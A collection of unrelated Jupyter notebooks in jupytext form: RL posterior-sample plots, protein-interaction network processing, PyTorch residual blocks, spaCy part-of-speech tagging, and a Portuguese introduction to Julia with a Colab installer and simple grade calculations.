pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, UbeNoUnrollAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
             'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
# Gaussian Q-posterior (mean and variance) logged at t = plot_time.
Qmu = agent.Qmu_log[T]
Qvar = agent.Qvar_log[T]
# 500 Q-samples per state from a normal with std scaled by zeta.
for s in range(Ns):
    samples.append([])
    for i in range(500):
        environment.s = s
        samples[-1].append(np.random.normal(Qmu[s, :], agent.zeta * Qvar[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
# NOTE(review): `optimal_actions` is reused from the PSRL cell rather than
# recomputed; Q is identical here so the labels match, but it couples cells.
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
    plt.subplot(1, Ns, s + 1)
    plt.scatter(samples[:, s, 0], samples[:, s, 1], color='green', marker='x', s=12)
    leg[0] = plt.scatter(samples[:, s, 0].mean(),
                         samples[:, s, 1].mean(),
                         color='red',
                         marker='x',
                         s=500,
                         linewidth=3)
    leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
    plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
    plt.xlim([0, 6])
    plt.ylim([0, 6])
    xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
    ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
    if optimal_actions[s] == 0:
        xlabel += ' (opt.)'
    else:
        ylabel += ' (opt.)'
    plt.xlabel(xlabel, fontsize=24)
    plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'UBE samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
# Figure file name encodes the hyperparameters (dots -> underscores).
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'ube-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # UBE
# Agent parameters
# Same UBE configuration as above but with a smaller exploration scale
# (zeta = 0.1) for comparison.
agent_params = {'gamma' : 0.9,
                'kappa' : 1.0,
                'mu0' : 0.0,
                'lamda' : 4.0,
                'alpha' : 3.0,
                'beta' : 3.0,
                'Rmax' : environment.get_mean_P_and_R()[1].max(),
                'max_iter' : max_iter,
                'zeta' : 0.1,
                'num_dyn_samples' : 100,
                'sa_list' : environment.sa_list()}
# +
# (Training loop kept for reference -- results are loaded from disk below.)
# for seed in tqdm(range(10)):
#     # Define agent
#     agent = UbeNoUnrollAgent(agent_params)
#     # Run experiment
#     run_experiment(environment=environment,
#                    agent=agent,
#                    seed=seed,
#                    num_time_steps=num_time_steps,
#                    max_buffer_length=max_buffer_length,
#                    save_every=save_every)
# +
# Optimal Q of the mean MDP, used as the ground-truth marker in the plots.
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, UbeNoUnrollAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
             'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
# Gaussian Q-posterior (mean and variance) logged at t = plot_time.
Qmu = agent.Qmu_log[T]
Qvar = agent.Qvar_log[T]
# 1000 Q-samples per state from a normal with std scaled by zeta.
for s in range(Ns):
    samples.append([])
    for i in range(1000):
        environment.s = s
        samples[-1].append(np.random.normal(Qmu[s, :], agent.zeta * Qvar[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
# NOTE(review): `optimal_actions` is still the one computed in the PSRL cell.
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
    plt.subplot(1, Ns, s + 1)
    plt.scatter(samples[:, s, 0], samples[:, s, 1], color='green', marker='x', s=12)
    leg[0] = plt.scatter(samples[:, s, 0].mean(),
                         samples[:, s, 1].mean(),
                         color='red',
                         marker='x',
                         s=500,
                         linewidth=3)
    leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
    plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
    plt.xlim([0, 6])
    plt.ylim([0, 6])
    xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
    ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
    if optimal_actions[s] == 0:
        xlabel += ' (opt.)'
    else:
        ylabel += ' (opt.)'
    plt.xlabel(xlabel, fontsize=24)
    plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'UBE samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
# Figure file name encodes the hyperparameters (dots -> underscores).
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'ube-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # Moment Matching
# Agent constants
agent_params = {'gamma' : 0.9,
                'kappa' : 1.0,
                'mu0' : 0.0,
                'lamda' : 4.0,
                'alpha' : 3.0,
                'beta' : 3.0,
                'max_iter' : max_iter,
                'zeta' : 1.0,
                'num_dyn_samples' : 100,
                'sa_list' : environment.sa_list()}
# +
# (Training loop kept for reference -- results are loaded from disk below.)
# for seed in tqdm(range(10)):
#     # Define agent
#     agent = MomentMatchingAgent(agent_params)
#     # Run experiment
#     run_experiment(environment=environment,
#                    agent=agent,
#                    seed=seed,
#                    num_time_steps=num_time_steps,
#                    max_buffer_length=max_buffer_length,
#                    save_every=save_every)
# +
# Optimal Q of the mean MDP, used as the ground-truth marker in the plots.
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, MomentMatchingAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
             'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
# Moment-matched Q mean and variance logged at t = plot_time.
mu = agent.mu_log[T]
var = agent.var_log[T]
# 250 Q-samples per state from a normal with std scaled by zeta.
for s in range(Ns):
    samples.append([])
    for i in range(250):
        environment.s = s
        samples[-1].append(np.random.normal(mu[s, :], agent.zeta * var[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
# NOTE(review): `optimal_actions` is still the one computed in the PSRL cell.
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
    plt.subplot(1, Ns, s + 1)
    plt.scatter(samples[:, s, 0], samples[:, s, 1], color='deepskyblue', marker='x', s=12)
    leg[0] = plt.scatter(samples[:, s, 0].mean(),
                         samples[:, s, 1].mean(),
                         color='red',
                         marker='x',
                         s=500,
                         linewidth=3)
    leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
    plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
    plt.xlim([0, 6])
    plt.ylim([0, 6])
    xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
    ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
    if optimal_actions[s] == 0:
        xlabel += ' (opt.)'
    else:
        ylabel += ' (opt.)'
    plt.xlabel(xlabel, fontsize=24)
    plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'MM samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
# Figure file name encodes the hyperparameters (dots -> underscores).
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'mm-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
|
code/experiments/plot-correlations-priormdp.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
from network_evaluation_tools import gene_conversion_tools as gct
from network_evaluation_tools import data_import_tools as dit
import pandas as pd
import itertools
import time
# ## Load InBio_Map Raw Data
# #### Source: https://www.intomics.com/inbio/map/#downloads
# Downloaded: November 30, 2016
# Last Updated: September 12, 2016
# Note about scoring: According to the supplement of the associated paper (<NAME>, et al. A scored human protein–protein interaction network to catalyze genomic interpretation. Nature Methods 14, 61–64 (2017) doi:10.1038/nmeth.4083), column 15 (index=14) should correspond to the confidence score of the edge. This column has 2 values, the confidence score and initial score. We will use the confidence score as it is a corrected version of the initial score calculated, indicating confidence that a particular interaction is real.
wd = '/cellar/users/jkhuang/Data/Projects/Network_Analysis/Data/'
# NOTE(review): header=-1 is a long-deprecated alias for "no header row";
# modern pandas requires header=None -- confirm the pinned (Python 2 era)
# pandas version before re-running.
InBio_Map_Raw = pd.read_csv(wd+'Network_Data_Raw/InBio_Map_core_2016_09_12/core.psimitab',sep='\t', header=-1)
print 'Raw edge count in InBio_Map:', len(InBio_Map_Raw)
# Keep only edges where BOTH interactors are human (taxid 9606).
InBio_Map_Human_Only = InBio_Map_Raw[(InBio_Map_Raw[9]=='taxid:9606(Homo sapiens)') & (InBio_Map_Raw[10]=='taxid:9606(Homo sapiens)')]
print 'Human-Human only interactions in InBioMap:', len(InBio_Map_Human_Only)
# Extract gene list
# Union of both interactor columns -> unique identifiers, coerced to str.
InBio_Map_Human_Genes = list(set(InBio_Map_Human_Only[0]).union(set(InBio_Map_Human_Only[1])))
InBio_Map_Human_Genes = [str(gene) for gene in InBio_Map_Human_Genes]
# ## Convert Genes
# Construct list of genes to be submitted to MyGene.Info API
query_string, valid_genes, invalid_genes = gct.query_constructor(InBio_Map_Human_Genes)
# +
# Set scopes (gene naming systems to search)
scopes = "uniprot"
# Set fields (systems from which to return gene names from)
fields = "symbol, entrezgene"
# -
# Query MyGene.Info
match_list = gct.query_batch(query_string, scopes=scopes, fields=fields)
print len(match_list), 'Matched query results'
match_table_trim, query_to_symbol, query_to_entrez = gct.construct_query_map_table(match_list, valid_genes)
# ## Construct Converted Network
# Columns 0/1 are the interactors; column 14 holds 'confidence|initial'
# scores -- keep the confidence component (before the '|') as the edge weight.
query_edgelist = InBio_Map_Human_Only[[0, 1, 14]].values.tolist()
query_edgelist_fmt = [[edge[0].split(':')[1], edge[1].split(':')[1], float(edge[2].split('|')[0])] for edge in query_edgelist]
# %%time
# Convert weighted edge list
InBioMap_edgelist_symbol = gct.convert_edgelist(query_edgelist_fmt, query_to_symbol, weighted=True)
# Filter converted edge list
InBioMap_edgelist_symbol_filt = gct.filter_converted_edgelist(InBioMap_edgelist_symbol, weighted=True)
# Write network to file
gct.write_edgelist(InBioMap_edgelist_symbol_filt, wd+'Network_SIFs_Symbol/InBioMap_Symbol.sif', binary=False)
# Create filtered network
InBioMap90_edgelist = dit.filter_weighted_network_sif(wd+'Network_SIFs_Symbol/InBioMap_Symbol.sif', nodeA_col=0, nodeB_col=1, score_col=2,
                                                      q=0.9, delimiter='\t', verbose=True, save_path=wd+'Network_SIFs_Symbol/InBioMap90_Symbol.sif')
# The filter function didn't work here because the max value makes up >90% of the edges.
# We need to filter but keep all max edges instead
InBioMap_edgelist = pd.DataFrame(InBioMap_edgelist_symbol_filt, columns=['NodeA', 'NodeB', 'edgeScore'])
# 90th-percentile score threshold; '>=' keeps every max-score edge too.
q_score = InBioMap_edgelist['edgeScore'].quantile(0.9)
InBioMap_edgelist_filt = InBioMap_edgelist[InBioMap_edgelist['edgeScore']>=q_score]
print InBioMap_edgelist_filt.shape[0], '/', InBioMap_edgelist.shape[0], 'edges kept, ', float(InBioMap_edgelist_filt.shape[0])/InBioMap_edgelist.shape[0]
# Keeping all edges where the score == 1, it's a top 75% network, we will save this
InBioMap_edgelist_filt[['NodeA', 'NodeB']].to_csv(wd+'Network_SIFs_Symbol/InBioMap75_Symbol.sif', sep='\t', index=False, header=False)
|
Network Processing Notebooks/InBioMap Processing.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# default_exp architecture.common
# +
#export
import torch.nn as nn
class ResBlock(nn.Module):
    """Residual block: two same-padding convolutions with a ReLU between.

    Channel count and spatial size are preserved, so the output is simply
    ``input + F(input)`` where F is conv -> ReLU -> conv.
    """

    def __init__(self, n_feats, kernel_size):
        super(ResBlock, self).__init__()
        pad = kernel_size // 2  # "same" padding for odd kernel sizes
        self.conv1 = nn.Conv2d(n_feats, n_feats, kernel_size, padding=pad)
        self.activation = nn.ReLU(inplace=True)
        self.conv2 = nn.Conv2d(n_feats, n_feats, kernel_size, padding=pad)

    def forward(self, input_):
        # Residual branch followed by the identity skip connection.
        return input_ + self.conv2(self.activation(self.conv1(input_)))
class ResNet(nn.Module):
    """Plain residual CNN: input conv -> ``n_resblocks`` ResBlocks -> output conv.

    All convolutions use "same" padding, so spatial size is preserved.
    """

    def __init__(self, in_channels, out_channels, n_feats=64, kernel_size=5, n_resblocks=19):
        super(ResNet, self).__init__()
        pad = kernel_size // 2
        self.input_layer = nn.Conv2d(in_channels, n_feats, kernel_size, padding=pad)
        # Trunk of identical residual blocks operating on n_feats channels.
        self.blocks = nn.ModuleList(ResBlock(n_feats, kernel_size) for _ in range(n_resblocks))
        self.output_layer = nn.Conv2d(n_feats, out_channels, kernel_size, padding=pad)

    def forward(self, input_):
        features = self.input_layer(input_)
        for blk in self.blocks:
            features = blk(features)
        return self.output_layer(features)
class UpConv2D(nn.Module):
    """Upscale by ``ratio`` via a channel-expanding conv + PixelShuffle.

    The convolution emits ``out_channels * ratio**2`` maps, which
    PixelShuffle rearranges into a (ratio*H, ratio*W) spatial grid.
    """

    def __init__(self, in_channels=3, out_channels=3, kernel_size=5, ratio=2):
        super(UpConv2D, self).__init__()
        self.conv = nn.Conv2d(in_channels, out_channels*(ratio**2), kernel_size, padding=(kernel_size // 2))
        self.upscale = nn.PixelShuffle(ratio)

    def forward(self, input_):
        return self.upscale(self.conv(input_))
# -
from nbdev.export import *
# Export all `#export`-tagged cells of this notebook into the library package.
notebook2script()
|
nbs/02_architecture_common.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import spacy
text1 = "Children shouldn't drink a sugary drink before bed."
# NOTE(review): the 'en' shortcut was removed in spaCy v3 -- modern installs
# need spacy.load('en_core_web_sm'); confirm the pinned spaCy version.
nlp = spacy.load('en')
doc = nlp(text1)
# Print each token with its coarse POS tag and fine-grained tag.
for token in doc:
    print(token.text , token.pos_ , token.tag_)
|
nlp-with-python/advanced_ nlp tasks with spacy.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia
# language: julia
# name: julia
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Grupo-de-Pesquisa-em-Macro-Aplicada/Ibmec-Pesquisa-Macro-Aplicada/blob/master/QM_IntroJulia.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="FROvo3UdM-FY"
# + id="GIeFXS0F0zww"
# %%shell
set -e
#---------------------------------------------------#
JULIA_VERSION="1.4.2" # any version ≥ 0.7.0
JULIA_PACKAGES="IJulia BenchmarkTools PyCall PyPlot"
JULIA_PACKAGES_IF_GPU="CUDA"
JULIA_NUM_THREADS=4
#---------------------------------------------------#
# Install Julia + packages only on Colab ($COLAB_GPU is set there) and only
# when no julia binary is already on PATH.
if [ -n "$COLAB_GPU" ] && [ -z `which julia` ]; then
  # Install Julia
  # Major.minor component of the version, used in the download URL path.
  JULIA_VER=`cut -d '.' -f -2 <<< "$JULIA_VERSION"`
  echo "Installing Julia $JULIA_VERSION on the current Colab Runtime..."
  BASE_URL="https://julialang-s3.julialang.org/bin/linux/x64"
  URL="$BASE_URL/$JULIA_VER/julia-$JULIA_VERSION-linux-x86_64.tar.gz"
  wget -nv $URL -O /tmp/julia.tar.gz # -nv means "not verbose"
  tar -x -f /tmp/julia.tar.gz -C /usr/local --strip-components 1
  rm /tmp/julia.tar.gz
  # Install Packages
  # Add the GPU-only package set when a GPU runtime is attached.
  if [ "$COLAB_GPU" = "1" ]; then
    JULIA_PACKAGES="$JULIA_PACKAGES $JULIA_PACKAGES_IF_GPU"
  fi
  for PKG in `echo $JULIA_PACKAGES`; do
    echo "Installing Julia package $PKG..."
    julia -e 'using Pkg; pkg"add '$PKG'; precompile;"'
  done
  # Install kernel and rename it to "julia"
  echo "Installing IJulia kernel..."
  julia -e 'using IJulia; IJulia.installkernel("julia", env=Dict(
      "JULIA_NUM_THREADS"=>"'"$JULIA_NUM_THREADS"'"))'
  KERNEL_DIR=`julia -e "using IJulia; print(IJulia.kerneldir())"`
  KERNEL_NAME=`ls -d "$KERNEL_DIR"/julia*`
  mv -f $KERNEL_NAME "$KERNEL_DIR"/julia
  echo ''
  echo "Successfully installed `julia -v`!"
  echo "Please reload this page (press Ctrl+R, ⌘+R, or the F5 key) then"
  echo "jump to the 'Checking the Installation' section."
fi
# + id="EEzvvzCl1i0F" colab={"base_uri": "https://localhost:8080/"} outputId="c2a05535-00d3-469a-b7fd-eccaff171f10"
versioninfo()
# + [markdown] id="Et7_NZkYKYi3"
# Pretty similar, right? But notice the small differences:
#
# |Julia|Python
# |-----|------
# |`function` | `def`
# |`for i in X`<br /> `...`<br />`end` | `for i in X:`<br /> `...`
# |`1:n` | `range(1, n+1)`
# |`cond ? a : b` | `a if cond else b`
# |`2i + 1` | `2 * i + 1`
# |`4s` | `return 4 * s`
# |`println(a, b)` | `print(a, b, sep="")`
# |`print(a, b)` | `print(a, b, sep="", end="")`
# |`"$p"` | `f"{p}"`
# |`"$(p - π)"` | `f"{p - math.pi}"`
#
# This example shows that:
# * Julia can be just as concise and readable as Python.
# * Indentation in Julia is _not_ meaningful like it is in Python. Instead, blocks end with `end`.
# * Many math features are built in Julia and need no imports.
# * There's some mathy syntactic sugar, such as `2i` (but you can write `2 * i` if you prefer).
# * In Julia, the `return` keyword is optional at the end of a function. The result of the last expression is returned (`4s` in this example).
# * Julia loves Unicode and does not hesitate to use Unicode characters like `π`. However, there are generally plain-ASCII equivalents (e.g., `π == pi`)
# + [markdown] id="jAZiukdktw1w"
# # Ola
# + id="iHoy3b5etW7Y" colab={"base_uri": "https://localhost:8080/"} outputId="df054e70-5067-43fe-bed1-1b77610e3832"
print("Ola Mundo!")
# + [markdown] id="j67REsS5tyxz"
# # Operacoes Aritmeticas
# + id="gBCD-w3jt1Ks" colab={"base_uri": "https://localhost:8080/"} outputId="62a94b92-3ca1-4d50-9fc3-a4f57689b557"
# Basic arithmetic demo: add the two variables and display the result.
x = 1
y = 2
# Was `s = s+1`, which raises UndefVarError in a fresh kernel because `s` is
# not yet defined; the arithmetic demo presumably intended the sum of x and y.
s = x + y
s
# + [markdown] id="ro8n4VSPt8Su"
# # Funcoes
# + id="iJltitALt-UE" colab={"base_uri": "https://localhost:8080/"} outputId="cfc327cc-94e1-4598-8832-3cb899cced04"
# Return the sum of the two arguments.
function somar(x,y)
    return x + y
end
# + colab={"base_uri": "https://localhost:8080/"} id="oSstYCFySr6X" outputId="70aa6e83-5eef-4e44-d0f5-c4ee0e9cc0c1"
r= somar(1,2)
r
# + [markdown] id="Xcq7FYziKl3h"
#
#
# |Julia|Python
# |-----|------
# |`if cond1`<br /> `...`<br/>`elseif cond2`<br /> `...`<br/>`else`<br /> `...`<br/>`end` |`if cond1:`<br /> `...`<br/>`elif cond2:`<br /> `...`<br/>`else:`<br /> `...`
# |`&&` | `and`
# |`\|\|` | `or`
# |`!` | `not`
# |`⊻` (type `\xor<tab>`) | `^`
# |`true` | `True`
# |`false` | `False`
# |`cond && f()` | `if cond: f()`
# |`cond \|\| f()` | `if not cond: f()`
# |`for i in 1:5 ... end` | `for i in range(1, 6): ...`
# |`for i in 1:5, j in 1:6 ... end` | `from itertools import product`<br />`for i, j in product(range(1, 6), range(1, 7)):`<br /> `...`
# |`while cond ... end` | `while cond: ...`
# |`continue` | `continue`
# |`break` | `break`
#
# + [markdown] id="a189KYLzusIR"
# # Condicionais
# + id="_8owNy9juuNa" colab={"base_uri": "https://localhost:8080/"} outputId="1c030879-0645-4495-a568-b132e3490dd5"
# "Aprovado" requires a grade strictly above 7 AND attendance of at least 75%.
function aprovacao(nota, freq)
    return (nota > 7 && freq >= 0.75) ? "Aprovado" : "Reprovado"
end
luiz = aprovacao(9,0.8)
luiz
# + [markdown] id="qjYW0m89vYgf"
# # Loops
# + id="Ue_0hYaMvbnW" colab={"base_uri": "https://localhost:8080/"} outputId="79d2445f-55d5-44b6-93e5-d46b306bfaf7"
# Arithmetic mean of the demo class's hard-coded grade list.
function media_turma()
    notas = [5,5,6,6,7,7,8,8,9,9]
    return sum(notas) / length(notas)
end
mt = media_turma()
mt
# + colab={"base_uri": "https://localhost:8080/"} id="Ei2Clk5lUBOk" outputId="800829e4-b053-4efb-cf0b-95e436deacd9"
notas = [5,5,6,6,7,7,8,8,9,9]
notas[1]
# + [markdown] id="T0HKieaVwD-i"
# # Funcao de Alta Ordem
# + id="bCMu8xQ2wHYd" colab={"base_uri": "https://localhost:8080/"} outputId="9faaf97e-0488-4aab-e6a0-ae703f3d8c92"
# Re-definition of the addition helper from the earlier cell.
function somar(x,y)
    return x + y
end
# Higher-order function: apply the binary function f to x and y.
function calculadora(f,x,y)
    resultado = f(x,y)
    return resultado
end
r = calculadora(somar,1,2)
r
# + [markdown] id="hrvoSFM5vIqJ"
# # Analise de Dados
# + id="9eCGkzkRvXQN" colab={"base_uri": "https://localhost:8080/"} outputId="33411c93-6d53-4d76-a532-005b11144f14"
import Pkg
Pkg.add("CSV")
Pkg.add("DataFrames")
Pkg.add("HTTP")
using CSV
using DataFrames
using HTTP
# + id="mHKKDOpbvo2S" colab={"base_uri": "https://localhost:8080/"} outputId="1de978ec-efd9-4df4-fc61-b16542be4ddf"
;wget http://quant-ibmec.group/notas.csv
# + colab={"base_uri": "https://localhost:8080/"} id="ANAoR102WF1O" outputId="e99ae82e-65a8-4df7-f700-4f467690ca92"
;ls -la
# + id="PY8qdNdJvK0u" colab={"base_uri": "https://localhost:8080/"} outputId="bcf1e34e-c245-4bd2-f8ad-f2c99eb17264"
# Read the downloaded CSV into a DataFrame (CSV.read needs an explicit sink).
notas=CSV.read("notas.csv", DataFrame)
@show typeof(notas)
print(notas)
# + colab={"base_uri": "https://localhost:8080/"} id="MKm1ErTfHFM9" outputId="354f3426-5a09-49f8-ef2e-52f47dc0e8ed"
# Alternative: stream the CSV straight from the web without saving to disk.
grades = DataFrame(CSV.File(HTTP.get("http://quant-ibmec.group/notas.csv").body))
print(grades)
# + colab={"base_uri": "https://localhost:8080/", "height": 129} id="NKzagjOjLkwr" outputId="2e9b0998-e990-4370-ae08-bffeef5395a0"
# First two rows only.
first(grades,2)
# + id="LtCEzBCNBOPP" colab={"base_uri": "https://localhost:8080/"} outputId="42428010-5e82-4544-bf5b-a0333a7ba34d"
print(notas.AP1)
# + colab={"base_uri": "https://localhost:8080/"} id="muwqYx7-IZ5z" outputId="860dddcf-5531-43e0-d2b3-7b1295b684b8"
notas.AP1
# + colab={"base_uri": "https://localhost:8080/"} id="AYJBfrwpHu4J" outputId="ea563ec7-a066-4fb6-fc8b-4dae85a53ec3"
# Weighted final grade: AP1 and AP2 weigh 40% each, AP3 weighs 20%.
notas.MF=notas.AP1*0.4+notas.AP2*0.4+notas.AP3*0.2
print(notas)
# + [markdown] id="XPG_I7GAvK7Q"
# # Matrizes
# + [markdown] id="bdnpqswqyrp8"
# |Julia|Python
# |-----|------
# |`a = [1, 2, 3]` | `a = [1, 2, 3]`<br />or<br />`import numpy as np`<br />`np.array([1, 2, 3])`
# |`a[1]` | `a[0]`
# |`a[end]` | `a[-1]`
# |`a[2:end-1]` | `a[1:-1]`
# |`push!(a, 5)` | `a.append(5)`
# |`pop!(a)` | `a.pop()`
# |`M = [1 2 3]` | `np.array([[1, 2, 3]])`
# |`M = [1 2 3]'` | `np.array([[1, 2, 3]]).T`
# |`M = hvcat(1, 1, 2, 3)` | `np.array([[1], [2], [3]])`
# |`M = [1 2 3`<br /> `4 5 6]`<br />or<br />`M = [1 2 3; 4 5 6]` | `M = np.array([[1,2,3], [4,5,6]])`
# |`M[1:2, 2:3]` | `M[0:2, 1:3]`
# |`[M1; M2]` | `np.r_[M1, M2]`
# |`[M1 M2]` | `np.c_[M1, M2]`
# |`[M1 M2; M3]` | `np.r_[np.c_[M1, M2], M3]`
#
# + colab={"base_uri": "https://localhost:8080/"} id="-rM-Gx4gMIpo" outputId="881c6e6b-a025-4e2f-acad-aadd2ea148ff"
# 3x3 grade matrix: one row per student, one column per assessment.
notas = [5 5 5
         9 9 9
         6 7 8]
pesos = [0.4 0.4 0.2]
# Weighted final grade per student: (3x3) * (3x1) matrix product via the
# transposed weight row-vector.
mf = notas * pesos'
print(mf)
# + [markdown] id="9Gxz4BVNMJDs"
# # Outras Referencias
# + [markdown] id="Ie9QcVsYWDFh"
# |Julia|Python
# |-----|------
# |`Dict("tree"=>"arbre", "love"=>"amour")` | `{"tree": "arbre", "love": "amour"}`
# |`d["arbre"]` | `d["arbre"]`
# |`get(d, "unknown", "default")` | `d.get("unknown", "default")`
# |`keys(d)` | `d.keys()`
# |`values(d)` | `d.values()`
# |`haskey(d, k)` | `k in d`
# |`Dict(i=>i^2 for i in 1:4)` | `{i: i**2 for i in range(1, 5)}`
# |`for (k, v) in d` | `for k, v in d.items():`
# |`merge(d1, d2)` | `{**d1, **d2}`
# |`merge!(d1, d2)` | `d1.update(d2)`
# + [markdown] id="nPrJ9Ih9X4ak"
# |Julia|Python
# |-----|------
# |`Set([1, 3, 5, 7])` | `{1, 3, 5, 7}`
# |`5 in odd` | `5 in odd`
# |`Set([i^2 for i in 1:4])` | `{i**2 for i in range(1, 5)}`
# |`odd ∪ primes` | `odd | primes`
# |`union(odd, primes)` | `odd.union(primes)`
# |`odd ∩ primes` | `odd & primes`
# |`intersect(odd, primes)` | `odd.intersection(primes)`
# |`setdiff(odd, primes)` | `odd - primes` or `odd.difference(primes)`
# |`symdiff(odd, primes)` | `odd ^ primes` or `odd.symmetric_difference(primes)`
# + [markdown] id="bBCsVIXEHD29"
# |Julia|Python
# |-----|------
# |`@enum Fruit apple=1 banana=2 orange=3` | `from enum import Enum`<br />`class Fruit(Enum):`<br /> `APPLE = 1`<br /> `BANANA = 2`<br /> `ORANGE = 3`
# | `Fruit(2) === banana` | `Fruit(2) is Fruit.BANANA`
# | `instances(Fruit)` | `dir(Fruit)`
#
# + [markdown] id="K3EO6cQmMW0W"
# |Julia|Python
# |-----|------
# |`a === b` | `a is b`
# |`a !== b` | `a is not b`
# |`objectid(obj)` | `id(obj)`
# + [markdown] id="UpbuZ0RYGsC2"
# The `options` vararg acts like a dictionary (we will discuss dictionaries later). The keys are **symbols**, e.g., `:verbose`. Symbols are like strings, less flexible but faster. They are typically used as keys or identifiers.
#
# |Julia|Python (3.8+ if `/` is used)
# |-----|------
# | `function foo(a, b=2, c=3)`<br /> `...`<br />`end`<br /><br />`foo(1, 2) # positional only` | `def foo(a, b=2, c=3, /):`<br /> `...`<br /><br />`foo(1, 2) # pos only because of /`
# | `function foo(;a=1, b, c=3)`<br /> `...`<br />`end`<br /><br />`foo(c=30, b=2) # keyword only` | `def foo(*, a=1, b, c=3):`<br /> `...`<br /><br />`foo(c=30, b=2) # kw only because of *`
# | `function foo(a, b=2; c=3, d)`<br /> `...`<br />`end`<br /><br />`foo(1; d=4) # pos only; then keyword only` | `def foo(a, b=2, /, *, c=3, d):`<br /> `...`<br /><br />`foo(1, d=4) # pos only then kw only`
# | `function foo(a, b=2, c...)`<br /> `...`<br />`end`<br /><br />`foo(1, 2, 3, 4) # positional only` | `def foo(a, b=2, /, *c):`<br /> `...`<br /><br />`foo(1, 2, 3, 4) # positional only`
